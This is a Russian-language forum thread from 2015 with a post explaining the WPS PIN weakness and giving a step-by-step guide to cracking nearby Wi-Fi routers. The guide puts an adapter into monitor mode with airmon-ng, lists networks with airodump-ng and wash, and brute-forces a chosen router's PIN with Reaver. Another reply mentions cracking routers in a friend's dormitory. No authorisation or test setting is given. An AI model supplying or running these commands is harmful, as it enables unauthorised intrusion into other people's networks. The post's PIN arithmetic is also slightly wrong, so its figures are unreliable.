(14 июн 2015, 20:26) (
0/
0)
[
0]
CZAR,
у меня вокруг роутеры новые ) у друга в общаге ломали =)
(14 июн 2015, 20:11) (
0/
0)
[
0]
О Kali Linux
Kali Linux-свободная операционная система на основе Debian. Различием лишь является то, что в Kali собрано много программ для настройки, защиты и взлома сетей.
WPS
Взломать Wi-Fi роутер можно простым перебором паролей, но на это уйдет много времени. И тут нам помогает (или вредит) — Wi-Fi Protected Setup (защищённая установка), WPS — стандарт (и одноимённый протокол) полуавтоматического создания беспроводной сети Wi-Fi, созданный Wi-Fi Alliance. Официально запущен 8 января 2007 года. Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.
Короче говоря роутер имеет 8-значный пин-код, введя который не надо будет возиться с WPA/WEP паролями (те самые, которые указываются при настройке роутера).Вроде хорошая идея, не так ли? Но в 2011 году нашли прорехи и выяснилось, что можно взломать пароль за считанные часы.
Хоть в коде WPS 8 знаков, но 8-й знак это контрольная сумма, а так же в протоколе есть уязвимость, которая позволяет проверять пин-код блоками, а не целиком. Первый блок 4 цифры и второй блок 3 цифры. итого получается 9999+999=10998 комбинаций.
Reaver
Это та самая программа, при помощи которой перебирается пин-код.
Aircrack-ng
Тоже важная программа, которая мониторит сети.
Инструкция взлома:
Запускаем терминал и набираем
iwconfig
Перед нами отображаются все сетевые интерфейсы, в частности это eth0, lo и, как раз то, что нам нужно — wlan0 (бывает имеет др. название).
Запоминаем название интерфейса вводим команду
airmon-ng start wlan0
Теперь у нас в системе появился интерфейс mon0, через который будет осуществляться мониторинг.
Далее набираем
airodump-ng mon0
И видим сети вокруг нас (там будет побольше, чем вы видели сидя за windows).
Закончить искать — ctrl+c
Далее набираем
wash -i mon0 -C
и видим сети с включенным WPS.
Копируем BSSID и пишем (вместо МАК вписываем BSSID)
reaver -i mon0 -b MAK -a -vv
Далее ждем пока пройдет перебор(ну несколько часов)